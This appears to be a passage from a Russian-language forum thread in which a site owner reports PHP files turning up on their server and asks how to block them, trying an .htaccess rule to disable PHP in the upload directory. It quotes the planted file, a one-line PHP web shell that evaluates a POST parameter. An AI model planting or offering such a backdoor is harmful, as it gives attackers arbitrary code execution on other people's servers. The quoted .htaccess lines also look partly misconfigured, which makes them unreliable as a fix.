появляются скрипты *.php с кодом типа
Код: Выделить всё
<?php
eval($_POST['c']);
exit();
?>

Сам скрипт uploading'a проверял. Через него не могли потому что все файлы обрабатываются gd.
Пока найду дырку может пройти много времени Слышал что можно отключить выполнение скриптов php для определенной директории с помощью директивы php_value php_engine off. Попробовал
кинуть .htaccess в директорию для uploading'а и прописал в нем
Код: Выделить всё
php_value php_engine off
AllowOverride on